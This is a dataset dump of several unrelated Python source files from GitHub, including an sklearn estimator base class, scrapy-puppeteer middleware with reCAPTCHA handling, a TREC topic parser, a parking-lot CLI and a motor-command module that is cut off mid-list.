_check_inconsistent_params(self, **override_kwargs):\n expected = dict(self._params_json())\n expected.update(**override_kwargs)\n expected_df = pd.DataFrame(expected.values(), index=expected.keys(), columns=[\"expected\"])\n\n actual = self.get_params()\n actual_df = pd.DataFrame(actual.values(), index=actual.keys(), columns=[\"actual\"])\n\n params_df = expected_df.merge(actual_df, how=\"outer\", validate=\"1:1\", left_index=True, right_index=True)\n params_df.drop(index=[ix for ix in params_df.index if ix.startswith(\"__\")], inplace=True)\n params_df[pd.isnull(params_df)] = np.nan\n inconsistent_df = params_df[(params_df[\"actual\"] != params_df[\"expected\"]) & pd.notnull(params_df[\"expected\"])]\n\n if inconsistent_df.shape[0]:\n logging.warn(\"Found inconsistent %s params:\\n%s\", self.__class__.__name__, inconsistent_df.to_string(na_rep=\"\"))\n\n return inconsistent_df\n\n @classmethod\n def build(cls, tuned=True, fit=True, goldset_kwargs={}, **param_kwargs):\n # FIXME FIXME FIXME: THIS IS A BIG HONKING BUG. Although we have param_kwargs\n # above and we get _params_json() right below, we don't pass them into the\n # constructor. THIS MEANS THAT ANY MANIPULATION WE ASSUME IN THE CONSTRUCTOR\n # DOES NOT EVER HAPPEN if it is a function of non-default parameters.\n model = cls()\n if tuned:\n params = cls._params_json()\n params.update(param_kwargs)\n params.pop(\"__score\", None)\n model.set_params(**params)\n\n if fit:\n goldset = model.goldset(**goldset_kwargs)\n # not returning X, y as expected\n # This should only happen with KeywordOverlap and TitleSimilarity\n # because their goldsets are cached\n # and it's too much of a hassle to regenerate them\n if len(goldset) != 2:\n logging.warn(\"goldset method for %s not returning X, y as expected, defaulting y to None\", cls.__name__)\n X = goldset\n y = None\n else:\n X, y = goldset\n model = model.fit(X, y)\n\n return model\n\n def fit(self, *nargs, **kwargs):\n return self._postfit()\n\n # NOTE: Must be idempotent given fit().\n def _postfit(self):\n return self\n\n @classmethod\n def goldset(cls):\n df = pd.read_csv(cls._pkg_path(\"goldsets\", \"training.tsv\"), sep=\"\\t\", encoding=\"utf-8\")\n mask = None\n pruned_df = df\n if cls._goldset_target_key() is not None:\n pruned_df = df[pd.notnull(df[cls._goldset_target_key()])]\n if pruned_df.shape[0] < df.shape[0]:\n pruned_pct = 1.000 - pruned_df.shape[0] / float(df.shape[0])\n if pruned_pct >= 0.250:\n level = logging.CRITICAL\n elif pruned_pct >= 0.100:\n level = logging.ERROR\n else:\n level = logging.WARNING\n logging.log(level, \"Dropped {:.1%} of {:} goldset\".format(pruned_pct, cls.__name__))\n\n X = pruned_df\n y = None\n if cls._goldset_target_key() is not None:\n X = pruned_df[[c for c in df if c != cls._goldset_target_key()]]\n y = pruned_df[cls._goldset_target_key()]\n\n if hasattr(cls, \"_preprocess_X\"):\n X = cls._preprocess_X(X)\n if hasattr(cls, \"_preprocess_y\"):\n y = cls._preprocess_X(y)\n return X, y\n\n @classmethod\n def _goldset_kwargs(cls):\n return {}\n\n @classmethod\n def _goldset_target_key(cls):\n return NotImplementedError()\n\n @classmethod\n def _raw_scorer(cls, estimator, X, y):\n return estimator.score(X, y)\n\n @classmethod\n def _cv_scorer(cls, estimator, X, y_gold, random_state=None):\n y_pred = cls._cv_predict(estimator, X, y_gold, random_state=random_state)\n score = cls._metric_score(y_gold, y_pred)\n return score\n\n @classmethod\n def _cv_predict(cls, estimator, X, y_gold, random_state=None):\n if random_state is not None:\n random.seed(random_state)\n np.random.seed(random_state)\n y_pred = cross_val_predict(estimator, X, y_gold, n_jobs=1, cv=estimator._cv_splitter(random_state=random_state))\n return y_pred\n\n @classmethod\n def _cv_splitter(cls, n_splits=5, random_state=None):\n # FIXME: shuffle=True may be introducing noise between splits. Turning\n # off causes some weird, unexplained (but reproducible) exception.\n #\n # File \"/Users/kushalc/Dropbox/TalentWorks/backend-github/postings/specialty_classifier.py\", line 79, in predict\n # y[mask] = model.predict(O[mask])\n # File \"/usr/local/lib/python2.7/site-packages/sklearn/utils/metaestimators.py\", line 54, in \n # out = lambda *args, **kwargs: self.fn(obj, *args, **kwargs)\n # File \"/usr/local/lib/python2.7/site-packages/sklearn/pipeline.py\", line 326, in predict\n # Xt = transform.transform(Xt)\n # File \"/usr/local/lib/python2.7/site-packages/sklearn/pipeline.py\", line 766, in transform\n # for name, trans, weight in self._iter())\n # File \"/usr/local/lib/python2.7/site-packages/sklearn/preprocessing/data.py\", line 1344, in normalize\n # estimator='the normalize function', dtype=FLOAT_DTYPES)\n # File \"/usr/local/lib/python2.7/site-packages/sklearn/utils/validation.py\", line 416, in check_array\n # context))\n # ValueError: Found array with 0 sample(s) (shape=(0, 172)) while a minimum of 1 is required by the normalize function.\n #\n # NOTE: Switching to RepeatedStratifiedKFold, etc. or anything else that repeats the testset will result in errors\n # given blended use of cross_val_predict and _metric_score above.\n return StratifiedKFold(shuffle=True, n_splits=n_splits, random_state=random_state)\n\n @classmethod\n def _cache_path(cls, method=None, dt=None, format=\"cloudpickle\", **kwargs):\n if method is None:\n method = cls.get\n cached_path = _s3_path(cls.__module__, method, [cls, cls.__variant__], kwargs,\n dt=dt, format=format)\n return cached_path\n\n @classmethod\n def _pkg_path(cls, package, filename, cls_name=None):\n if not cls_name:\n cls_name = cls.name(full=True)\n rpath = os.path.join(cls_name, filename)\n apath = os.path.join(package, rpath)\n return apath\n\n @classmethod\n def _params_json(cls, name=\"base\"):\n # NOTE: This will barf if it can't find the PARAMS_JSON file. After the\n # spaCy debacle of Feb 2017, this is desired. We only want tuned models.\n return load_json(cls._params_path(name))\n\n @classmethod\n def _params_path(cls, name=\"base\"):\n return cls._pkg_path(\"parameters\", \"%s.json\" % name)\n\n @classmethod\n def _tmp_path(cls):\n path = os.path.join(os.environ[\"APP_ROOT\"], \"tmp\", datetime.now().strftime(\"%Y-%m-%d\"),\n cls.__module__ + \".\" + cls.__name__)\n if not os.path.exists(path):\n os.makedirs(path)\n return path\n","repo_name":"kushalc/coreutils","sub_path":"util/estimator/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":8545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30785536175","text":"import json\nimport logging\nfrom collections import defaultdict\nfrom typing import List, Union\nfrom urllib.parse import urlencode, urljoin\n\nfrom scrapy import Request, signals\nfrom scrapy.crawler import Crawler\nfrom scrapy.exceptions import IgnoreRequest, NotConfigured\nfrom scrapy.http import Headers, TextResponse\n\nfrom scrapypuppeteer.actions import Click, GoBack, GoForward, GoTo, RecaptchaSolver, Screenshot, Scroll, CustomJsAction\nfrom scrapypuppeteer.response import PuppeteerResponse, PuppeteerHtmlResponse, PuppeteerScreenshotResponse, PuppeteerJsonResponse\nfrom scrapypuppeteer.request import ActionRequest, PuppeteerRequest\n\n\nclass PuppeteerServiceDownloaderMiddleware:\n \"\"\"\n This downloader middleware converts PuppeteerRequest instances to\n Puppeteer service API requests and then converts its responses to\n PuppeteerResponse instances. Additionally, it tracks all browser contexts\n that spider uses and performs cleanup request to service once spider\n is closed.\n\n Additionally, the middleware uses these meta-keys, do not use them, because their changing\n could possibly (almost probably) break determined behaviour:\n 'puppeteer_request', 'dont_obey_robotstxt', 'proxy'\n\n Settings:\n\n PUPPETEER_SERVICE_URL (str)\n Service URL, e.g. 'http://localhost:3000'\n\n PUPPETEER_INCLUDE_HEADERS (bool|list[str])\n Determines which request headers will be sent to remote site by puppeteer service.\n Either True (all headers), False (no headers) or list of header names.\n May be overriden per request.\n By default, only cookies are sent.\n\n PUPPETEER_INCLUDE_META (bool)\n Determines whether to send or not user's meta attached by user.\n Default to False.\n \"\"\"\n\n SERVICE_URL_SETTING = 'PUPPETEER_SERVICE_URL'\n INCLUDE_HEADERS_SETTING = 'PUPPETEER_INCLUDE_HEADERS'\n SERVICE_META_SETTING = 'PUPPETEER_INCLUDE_META'\n DEFAULT_INCLUDE_HEADERS = ['Cookie'] # TODO send them separately\n\n def __init__(self,\n crawler: Crawler,\n service_url: str,\n include_headers: Union[bool, List[str]],\n include_meta: bool):\n self.service_base_url = service_url\n self.include_headers = include_headers\n self.include_meta = include_meta\n self.crawler = crawler\n self.used_contexts = defaultdict(set)\n\n @classmethod\n def from_crawler(cls, crawler):\n service_url = crawler.settings.get(cls.SERVICE_URL_SETTING)\n if service_url is None:\n raise ValueError('Puppeteer service URL must be provided')\n if cls.INCLUDE_HEADERS_SETTING in crawler.settings:\n try:\n include_headers = crawler.settings.getbool(cls.INCLUDE_HEADERS_SETTING)\n except ValueError:\n include_headers = crawler.settings.getlist(cls.INCLUDE_HEADERS_SETTING)\n else:\n include_headers = cls.DEFAULT_INCLUDE_HEADERS\n include_meta = crawler.settings.getbool(cls.SERVICE_META_SETTING, False)\n middleware = cls(crawler, service_url, include_headers, include_meta)\n crawler.signals.connect(middleware.close_used_contexts,\n signal=signals.spider_closed)\n return middleware\n\n def process_request(self, request, spider):\n if not isinstance(request, PuppeteerRequest):\n return\n\n action = request.action\n service_url = urljoin(self.service_base_url, action.endpoint)\n service_params = self._encode_service_params(request)\n if service_params:\n service_url += '?' + service_params\n\n meta = {\n 'puppeteer_request': request,\n 'dont_obey_robotstxt': True,\n 'proxy': None\n }\n if self.include_meta:\n meta = {\n **request.meta,\n **meta\n }\n\n return ActionRequest(\n url=service_url,\n action=action,\n method='POST',\n headers=Headers({'Content-Type': action.content_type}),\n body=self._serialize_body(action, request),\n dont_filter=True,\n cookies=request.cookies,\n priority=request.priority,\n callback=request.callback,\n cb_kwargs=request.cb_kwargs,\n errback=request.errback,\n meta=meta\n )\n\n @staticmethod\n def _encode_service_params(request):\n service_params = {}\n if request.context_id is not None:\n service_params['contextId'] = request.context_id\n if request.page_id is not None:\n service_params['pageId'] = request.page_id\n if request.close_page:\n service_params['closePage'] = 1\n return urlencode(service_params)\n\n def _serialize_body(self, action, request):\n payload = action.payload()\n if action.content_type == 'application/json':\n if isinstance(payload, dict):\n # disallow null values in top-level request parameters\n payload = {k: v for k, v in payload.items() if v is not None}\n proxy = request.meta.get('proxy')\n if proxy:\n payload['proxy'] = proxy\n include_headers = self.include_headers if request.include_headers is None else request.include_headers\n if include_headers:\n headers = request.headers.to_unicode_dict()\n if isinstance(include_headers, list):\n headers = {h.lower(): headers[h] for h in include_headers if h in headers}\n payload['headers'] = headers\n return json.dumps(payload)\n return str(payload)\n\n def process_response(self, request, response, spider):\n if not isinstance(response, TextResponse):\n return response\n\n puppeteer_request = request.meta.get('puppeteer_request')\n if puppeteer_request is None:\n return response\n\n if b'application/json' not in response.headers.get(b'Content-Type', b''):\n return response.replace(request=request)\n\n response_data = json.loads(response.text)\n response_cls = self._get_response_class(puppeteer_request.action)\n\n if response.status != 200:\n context_id = response_data.get('contextId')\n if context_id:\n self.used_contexts[id(spider)].add(context_id)\n return response\n\n return self._form_response(response_cls, response_data,\n puppeteer_request.url, request, puppeteer_request,\n spider)\n\n def _form_response(self, response_cls, response_data,\n url, request, puppeteer_request,\n spider):\n context_id = response_data.pop('contextId', puppeteer_request.context_id)\n page_id = response_data.pop('pageId', puppeteer_request.page_id)\n\n attributes = dict()\n for attr in response_cls.attributes:\n if attr in response_data:\n attributes[attr] = response_data.pop(attr)\n if response_data:\n attributes['data'] = response_data\n\n self.used_contexts[id(spider)].add(context_id)\n\n return response_cls(\n url=url,\n puppeteer_request=puppeteer_request,\n context_id=context_id,\n page_id=page_id,\n request=request,\n **attributes\n )\n\n @staticmethod\n def _get_response_class(request_action):\n if isinstance(request_action, (GoTo, GoForward, GoBack, Click, Scroll)):\n return PuppeteerHtmlResponse\n if isinstance(request_action, Screenshot):\n return PuppeteerScreenshotResponse\n return PuppeteerJsonResponse\n\n def close_used_contexts(self, spider):\n contexts = list(self.used_contexts[id(spider)])\n if contexts:\n request = Request(urljoin(self.service_base_url, '/close_context'),\n method='POST',\n headers=Headers({'Content-Type': 'application/json'}),\n meta={\"proxy\": None},\n body=json.dumps(contexts))\n return self.crawler.engine.downloader.fetch(request, None)\n\n\nclass PuppeteerRecaptchaDownloaderMiddleware:\n \"\"\"\n This middleware is supposed to solve recaptcha on the page automatically.\n If there is no captcha on the page then this middleware will do nothing\n on the page, so your 2captcha balance will remain the same.\n It can submit recaptcha if \"submit button\" is provided.\n It will not \"submit\" captcha if there is no submit-selector.\n\n If you want to turn Recaptcha solving off on the exact request provide\n meta-key 'dont_recaptcha' with True value. The middleware will skip the request\n through itself.\n\n The middleware uses additionally these meta-keys, do not use them, because their changing\n could possibly (almost probably) break determined behaviour:\n '_captcha_submission', '_captcha_solving'\n\n Settings:\n\n RECAPTCHA_ACTIVATION: bool = True - activates or not the middleware (if not - raises NotConfigured)\n RECAPTCHA_SOLVING: bool = True - whether solve captcha automatically or not\n RECAPTCHA_SUBMIT_SELECTORS: str | dict = {} - dictionary consisting of domains and\n these domains' submit selectors, e.g.\n 'www.google.com/recaptcha/api2/demo': '#recaptcha-demo-submit'\n it could be also squeezed to\n 'ecaptcha/api2/de': '#recaptcha-demo-submit'\n also you can use not just strings but Click actions with required parameters:\n 'ogle.com/recaptcha': Click('#recaptcha-demo-submit')\n In general - domain is a unique identifying string which is contained in web-page url\n If there is no button to submit recaptcha then provide empty string to a domain.\n This setting can also be a string. If so the middleware will only click the button\n related to this selector.\n This setting can also be unprovided. In this case every web-page you crawl is supposed to be\n without submit button, or you manually do it yourself.\n \"\"\"\n\n MIDDLEWARE_ACTIVATION_SETTING = \"RECAPTCHA_ACTIVATION\"\n RECAPTCHA_SOLVING_SETTING = \"RECAPTCHA_SOLVING\"\n SUBMIT_SELECTORS_SETTING = \"RECAPTCHA_SUBMIT_SELECTORS\"\n\n def __init__(self,\n recaptcha_solving: bool,\n submit_selectors: dict):\n self.submit_selectors = submit_selectors\n self.recaptcha_solving = recaptcha_solving\n self._page_responses = dict()\n self._page_closing = set()\n\n @classmethod\n def from_crawler(cls, crawler: Crawler):\n activation = crawler.settings.get(cls.MIDDLEWARE_ACTIVATION_SETTING, True)\n if not activation:\n raise NotConfigured\n recaptcha_solving = crawler.settings.get(cls.RECAPTCHA_SOLVING_SETTING, True)\n\n try:\n submit_selectors = crawler.settings.getdict(cls.SUBMIT_SELECTORS_SETTING, dict())\n except ValueError:\n submit_selectors = {'': crawler.settings.get(cls.SUBMIT_SELECTORS_SETTING, '')}\n except Exception as exception:\n raise ValueError(f\"Wrong argument(s) inside {cls.SUBMIT_SELECTORS_SETTING}: {exception}\")\n\n for key in submit_selectors.keys():\n submit_selector = submit_selectors[key]\n if isinstance(submit_selector, str):\n submit_selectors[key] = Click(selector=submit_selector)\n elif not isinstance(submit_selector, Click):\n raise ValueError(\"Submit selector must be str or Click,\"\n f\"but {type(submit_selector)} provided\")\n return cls(recaptcha_solving, submit_selectors)\n\n def process_request(self, request, spider):\n if request.meta.get('dont_recaptcha', False):\n return None\n\n if isinstance(request, PuppeteerRequest):\n if request.close_page and not request.meta.get('_captcha_submission', False):\n request.close_page = False\n request.dont_filter = True\n self._page_closing.add(request)\n return request\n return None\n\n def process_response(self,\n request, response,\n spider):\n if not isinstance(response, PuppeteerResponse): # We only work with PuppeteerResponses\n return response\n\n if request.meta.get('dont_recaptcha', False): # Skip such responses\n return response\n\n if request.meta.pop('_captcha_submission', False): # Submitted captcha\n return self.__gen_response(response)\n\n if request.meta.pop('_captcha_solving', False):\n # RECaptchaSolver was called by recaptcha middleware\n return self._submit_recaptcha(request, response, spider)\n\n if isinstance(response.puppeteer_request.action,\n (Screenshot, Scroll, CustomJsAction, RecaptchaSolver)):\n # No recaptcha after this action\n return response\n\n # Any puppeteer response besides RecaptchaSolver's PuppeteerResponse\n return self._solve_recaptcha(response)\n\n def _solve_recaptcha(self, response):\n self._page_responses[response.page_id] = response # Saving main response to return it later\n\n recaptcha_solver = RecaptchaSolver(solve_recaptcha=self.recaptcha_solving,\n close_on_empty=self.__is_closing(response, remove_request=False))\n return response.follow(recaptcha_solver,\n meta={'_captcha_solving': True},\n close_page=False)\n\n def _submit_recaptcha(self, request, response, spider):\n response_data = response.data\n if not response.puppeteer_request.action.solve_recaptcha:\n spider.log(message=f\"Found {len(response_data['recaptcha_data']['captchas'])} captcha \"\n f\"but did not solve due to argument\",\n level=logging.INFO)\n return self.__gen_response(response)\n # Click \"submit button\"?\n if response_data['recaptcha_data']['captchas'] and self.submit_selectors:\n # We need to click \"submit button\"\n for domain, submitting in self.submit_selectors.items():\n if domain in response.url:\n if not submitting.selector:\n return self.__gen_response(response)\n return response.follow(action=submitting,\n callback=request.callback,\n errback=request.errback,\n close_page=self.__is_closing(response),\n meta={'_captcha_submission': True})\n raise IgnoreRequest(\"No submit selector found to click on the page but captcha found\")\n return self.__gen_response(response)\n\n def __gen_response(self, response):\n main_response_data = dict()\n main_response_data['page_id'] = None if self.__is_closing(response) else response.puppeteer_request.page_id\n\n main_response = self._page_responses.pop(response.page_id)\n\n if isinstance(main_response, PuppeteerHtmlResponse):\n if isinstance(response.puppeteer_request.action, RecaptchaSolver):\n main_response_data['body'] = response.data['html']\n elif isinstance(response.puppeteer_request.action, Click):\n main_response_data['body'] = response.body\n\n return main_response.replace(**main_response_data)\n\n def __is_closing(self, response,\n remove_request: bool = True) -> bool:\n main_request = self._page_responses[response.page_id].puppeteer_request\n close_page = main_request in self._page_closing\n if close_page and remove_request:\n self._page_closing.remove(main_request)\n return close_page\n","repo_name":"ispras/scrapy-puppeteer","sub_path":"scrapypuppeteer/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":16066,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"3"} +{"seq_id":"12996412937","text":"\n# Hãy đưa số 1 về đầu List\n\nfrom random import *\n\ndef Tao_Lst(lst, n):\n for i in range(n):\n lst.append(randrange(0, 9))\n return lst\n\ndef Chuyen_Dau(lst):\n vt = 0\n for i in range(1, len(lst)):\n if lst[i] == 1:\n lst[vt] = lst[vt] + lst[i]\n lst[i] = lst[vt] - lst[i]\n lst[vt] = lst[vt] - lst[i]\n vt += 1\n return lst\n\nlst = []\nn = int(input('Nhập số lượng phần tử của List: '))\nprint('List vừa đc tạo là: ', Tao_Lst(lst, n))\nprint('List sau khi chuyển 1 lên đầu: ', Chuyen_Dau(lst))\n\n","repo_name":"HuynhLoc19/New_Git","sub_path":"Bai_150.py","file_name":"Bai_150.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9093785054","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 12 16:56:38 2019\n\n@author: leyv\n\"\"\"\n\n\nimport re\n\nfilename = 'trec/04数据集/04.testset'\nfile = open(filename)\nqu_set = str(file.read())\n#print(qu_set)\nfile.close()\nraw_list = qu_set.split('')\n\n\n\n#print(raw_list[9])\n'''\nnum_r = re.compile(r'(\\n?)(.*)\\n')\ntest_str = \"<title>\\nU.S. ethnic population\\n\\n<desc> Description: \"\ntest_str = \"<title>\\nU.S. ethnic population\\n\\n<desc> Description: \"\nprint(test_str)\nnum_object = re.search(num_r, test_str)# num_r.match(raw_item)\n\nprint(num_object.group(2) )\n\n'''\n\nnum_r = re.compile(r'Number:(.*)\\n')\ntitle_r = re.compile(r'<title>(\\n?)([\\d\\D]*)\\n<desc>')\ndesc_r = re.compile(r'<desc>(\\n?)([\\d\\D]*)\\n<narr>')\nnarr_r = re.compile(r'<narr>(\\n?)([\\d\\D]*)')\n\n\nqu_list = []\nfor raw_item in raw_list[:-1]:\n qu_dict = {}\n print(raw_item)\n num_object = re.search(num_r, raw_item)# num_r.match(raw_item)\n qu_dict['index'] = num_object.group(1).strip()\n \n title_object = re.search(title_r, raw_item)\n qu_dict['title'] = title_object.group(2).replace('\\n',' ').strip()\n \n desc_object = re.search(desc_r, raw_item)\n qu_dict['desc'] = desc_object.group(2).replace('Description:','').replace('\\n',' ').strip()\n \n narr_object = re.search(narr_r, raw_item)\n qu_dict['narr'] = narr_object.group(2).replace('Narrative:','').replace('\\n',' ').strip()\n qu_dict['content'] = qu_dict['title'] + '. ' + qu_dict['desc'] + '. ' + qu_dict['narr'].split(\". \")[0] + '.'\n \n qu_list.append(qu_dict)\nprint(len(raw_list))\nprint(raw_list[0])\nprint(qu_list[0])\n","repo_name":"malajuanxiao/TextRank_Extend_Block_TSM_ForSearch","sub_path":"python_index_snippet/fetch_qu.py","file_name":"fetch_qu.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33298813930","text":"import utils\nimport constants\n\nDATASET_VERSION = 'v1'\n\nfor trait_name in constants.TRAITS:\n df, _, indices, _ = utils.read_data(DATASET_VERSION,\n 'all',\n trait_name)\n data = df.loc[indices][trait_name]\n print(f'=== {trait_name.upper()} ===')\n if len(data) == 0:\n print(' EMPTY')\n else:\n print(f' count: {len(data):.2f}')\n print(f' mean: {data.mean():.2f}')\n print(f' median: {data.median():.2f}')\n print(f' std: {data.std():.2f}')\n","repo_name":"ashwhall/hyperspec-trait-prediction","sub_path":"src/dataset/print_dataset_stats.py","file_name":"print_dataset_stats.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"25220136084","text":"from parkinglot import Parking_lot\nimport argparse\n\n\nclass Parking_Commands(Parking_lot):\n def show(self, line):\n if line.startswith(\"create_parking_lot\"):\n num = int(line.split(' ')[1])\n res = self.create_parking_space(num)\n print('Created a parking lot with '+str(res)+' slots')\n\n elif line.startswith('park'):\n reg_no = line.split(' ')[1]\n colour = line.split(' ')[2]\n res = self.parking_of_vehicle(reg_no, colour)\n if res == -1:\n print(\"Sorry, parking lot is full\")\n else:\n print('Allocated slot number: '+str(res))\n\n elif line.startswith('leave'):\n leave_slot_id = int(line.split(' ')[1])\n status = self.leave_parking(leave_slot_id)\n if status == -1:\n print('Slot number '+str(leave_slot_id)+' is not available')\n elif status:\n print('Slot number '+str(leave_slot_id)+' is free')\n else:\n print('Slot number '+str(leave_slot_id)+' is already free')\n\n elif line.startswith('status'):\n self.show_all_parked_cars()\n\n elif line.startswith('registration_numbers_for_cars_with_colour'):\n colour = line.split(' ')[1]\n regnos = self.get_regno_of_all_car_by_colour(colour)\n print(', '.join(regnos))\n\n elif line.startswith('slot_numbers_for_cars_with_colour'):\n colour = line.split(' ')[1]\n slotnos = self.get_slot_no_of_all_car_by_colour(colour)\n print(', '.join(slotnos))\n\n elif line.startswith('slot_number_for_registration_number'):\n reg_no = line.split(' ')[1]\n slotno = self.get_slot_no_by_registration_no(reg_no)\n if slotno == -1:\n print(\"Not found\")\n else:\n print(slotno)\n\n elif line.startswith('exit'):\n print(\"Thank You!! For Using Our Parking Lot\")\n exit(0)\n\n def main(self):\n parkinglot = Parking_Commands()\n parser = argparse.ArgumentParser()\n parser.add_argument('-f', dest='srcfile', help=\"Input\")\n args = parser.parse_args()\n\n if args.srcfile:\n with open(args.srcfile) as f:\n for line in f:\n line = line.rstrip('\\n')\n parkinglot.show(line)\n else:\n while True:\n line = input(\"$ \")\n parkinglot.show(line)\n\n\nif __name__ == '__main__':\n run_parking = Parking_Commands()\n print(\"Welcome To Our Parking Lot\")\n run_parking.main()\n","repo_name":"mdasifraza/python_parking_lot_project","sub_path":"park_command.py","file_name":"park_command.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40825237490","text":"#модуль с командами\nfrom typing import List, Tuple, Dict, Optional, Union\nimport struct\nimport socket\n\nfrom tcp_client import Connection\n\n\nclass Command(object):\n def __init__(self, *, number: int = None, name: str = None):\n self.init_err_info: Optional[str] = None\n self.header: Optional[bytes] = None\n self.is_there_info_field: Optional[bool] = None\n self.is_there_data_field_in_response: Optional[bool] = None\n if number == 0: #in boolean expression 0 equals None. It can confuse a lot \n self.init_err_info = ('Wrong command number! '\n +'0 is forbidden value for a command number')\n print(self.init_err_info)\n return\n if not number: #init by name\n self.name = name\n self.number = command_num_from_name(name)\n if not self.number:\n self.init_err_info = (\n f'Command by the name of \"{name}\" was not found')\n print(self.init_err_info)\n return\n if not name: #init by number\n if type(number) != int:\n self.init_err_info = (\n 'Wrong command number! Command number must be an integer')\n print(self.init_err_info)\n return\n self.number = number\n self.name = command_name_from_num(number)\n if not self.name:\n self.init_err_info = (\n f'Command by the number of {number} was not found')\n print(self.init_err_info)\n return\n if number and name:\n self.init_err_info = (\n 'Unexpected command constructor args! '\n +'Either number or name should be provided. Not both of them')\n print(self.init_err_info)\n return\n # if __init__ err_info is empty then \"command\" instance should be \n # constructed and it should has proper command_name and command_number\n\n def __str__(self) -> str:\n return f'--- Command \"{self.name}\" (number {self.number})'\n\n '''def command_header_from_name(self) -> bytes:\n for command_tuple in command_info_list:\n return command_tuple[2] if command_tuple[1] == self.number else None'''\n\n def make_bytes_message(self, *info_field_params) -> bytes:\n for command_tuple in command_info_list:\n if command_tuple[1] == self.number:\n self.is_there_info_field: bool = command_tuple[3]\n self.header: bytes = bytes(command_tuple[2]) #NEED TESTING\n if not self.is_there_info_field: #если у команды нет \"информационного поля\"\n bytes_message = self.header\n elif self.is_there_info_field: #если у команды есть \"информационное поле\"\n info_field: Optional[bytes] = None\n if self.number == 61:\n info_field = reflector_motor_open_info(\n self.name, *info_field_params)\n if self.number == 71:\n info_field = reflector_motor_close_info(\n self.name, *info_field_params)\n if self.number == 102:\n info_field = bench_tension_setup_info(\n self.name, *info_field_params)\n if self.number == 112:\n info_field = bench_motor_open_info(\n self.name, *info_field_params)\n if self.number == 122:\n info_field = bench_motor_close_info(\n self.name, *info_field_params)\n if self.number == 132:\n info_field = bench_motor_tension_setup_info(\n self.name, *info_field_params)\n if self.number == 143:\n info_field = get_sensor_value_info(\n self.name, *info_field_params)\n if not info_field: #если инф. поле так и не сформировалось\n print('info_field was not formed')\n return\n bytes_message = concatenate_bytes(self.header, info_field)\n return bytes_message\n\n def check_response(self, actual_response: bytes) -> bool:\n if self.number == 143:\n is_command_succ = check_get_sensor_value(actual_response)\n elif self.number == 153:\n is_command_succ = check_get_all_sensors_values(actual_response)\n else: #standard response (without info_field)\n for command_tuple in command_info_list:\n if command_tuple[1] == self.number:\n command_code_in_header: int = int(bytearray(command_tuple[2])[1])\n ideal_response: bytearray = standard_response\n ideal_response[1] = command_code_in_header\n is_command_succ = actual_response == ideal_response \n return is_command_succ\n\n def send_and_check(\n self, conn: socket.socket, *info_field_params,\n get_response: bool = False) -> Union[Tuple[bool, bytes], bool]:\n message: bytes = self.make_bytes_message(*info_field_params)\n if not conn: \n print('No connection. Make connection first.')\n return\n if not message: \n print('Bytes message was not formed')\n return\n response: bytes = conn.send_message(message)\n is_command_succ = self.check_response(response)\n if not is_command_succ: \n print(f'WARNING! Command {self.name} have not worked properly')\n return (is_command_succ, response) if get_response else is_command_succ \n\n def decode_response_data(self, response: bytes) -> Optional[Tuple[int, ...]]:\n btray_response = bytearray(response)\n for command_tuple in command_info_list:\n if command_tuple[1] == self.number:\n self.is_there_data_field_in_response: bool = command_tuple[4]\n if not self.is_there_data_field_in_response:\n print(\"You've tried to decode data_field of the command which \"\n + \" doesn't have any data_field\")\n return\n elif self.is_there_data_field_in_response:\n if self.number == 143:\n data_field = btray_response[6:]\n if len(data_field) != 5:\n print('Wrong data_field length in response '\n +f'for \"{self.name}\" command.')\n decoded_response_data = tuple(struct.unpack('=Bl', data_field))\n if self.number == 153:\n data_field = btray_response[6:]\n if len(data_field) != 104:\n print('Wrong data_field length in response '\n + f'for \"{self.name}\" command.')\n decoded_response_data = tuple(struct.unpack('l'*26, data_field))\n return decoded_response_data\n#-------------------------функции для класса команд---------------------\n\ndef command_num_from_name(name: str) -> Optional[int]:\n for command_tuple in command_info_list:\n if command_tuple[0] == name:\n return command_tuple[1]\n\ndef command_name_from_num(number: int) -> Optional[str]:\n for command_tuple in command_info_list:\n if command_tuple[1] == number:\n return command_tuple[0]\n\ndef concatenate_bytes(bytes_1: bytes, bytes_2: bytes) -> bytes:\n # NEED TESTING\n return bytes(bytearray(bytes_1) + bytearray(bytes_2))\n\n#-----------------------------список команд------------------------\n\ncommand_info_list: List[Tuple[str, int, str, bool]] = [\n# (name_of_the_command, command_number, command_header, \n # is there additional info, is response standard)\n# number regarded as a key parameter (therefore all numbers must be unique)\n# more than that, command names editing won't break this module. \n # Though, it'll break others \n ('expand_all' , 10, b'\\x55\\x01\\x00\\x00\\x00\\x00', False, False), #01h\n ('contract_all' , 20, b'\\x55\\x02\\x00\\x00\\x00\\x00', False, False), #02h\n ('all_motors_stop' , 30, b'\\x55\\x03\\x00\\x00\\x00\\x00', False, False), #03h \n\n ('reflector_expand' , 41, b'\\x55\\x14\\x00\\x00\\x00\\x00', False, False), #14h\n ('reflector_contract' , 51, b'\\x55\\x15\\x00\\x00\\x00\\x00', False, False), #15h\n ('reflector_motor_open' , 61, b'\\x55\\x16\\x01\\x00\\x00\\x00', True , False), #16h\n ('reflector_motor_close' , 71, b'\\x55\\x17\\x01\\x00\\x00\\x00', True , False), #17h\n\n ('bench_expand' , 82, b'\\x55\\x28\\x00\\x00\\x00\\x00', False, False), #28h\n ('bench_contract' , 92, b'\\x55\\x29\\x00\\x00\\x00\\x00', False, False), #29h\n ('bench_tension_setup' , 102, b'\\x55\\x2A\\x04\\x00\\x00\\x00', True , False), #2Ah\n ('bench_motor_open' , 112, b'\\x55\\x2B\\x01\\x00\\x00\\x00', True , False), #2Bh\n ('bench_motor_close' , 122, b'\\x55\\x2C\\x01\\x00\\x00\\x00', True , False), #2Ch\n ('bench_motor_tension_setup', 132, 